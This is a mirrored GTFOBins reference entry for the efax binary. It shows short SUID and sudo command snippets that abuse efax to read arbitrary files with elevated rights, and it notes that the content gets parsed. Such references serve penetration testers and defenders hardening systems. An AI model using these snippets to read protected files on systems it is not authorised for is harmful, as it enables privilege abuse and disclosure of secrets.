mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
b226bbfc5d
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
13 lines
291 B
Markdown
13 lines
291 B
Markdown
---
|
|
description: The content is actually parsed by the command, thus it may not be suitable for reading arbitrary files.
|
|
functions:
|
|
suid:
|
|
- code: |
|
|
LFILE=file_to_read
|
|
./efax -d "$LFILE"
|
|
sudo:
|
|
- code: |
|
|
LFILE=file_to_read
|
|
sudo efax -d "$LFILE"
|
|
---
|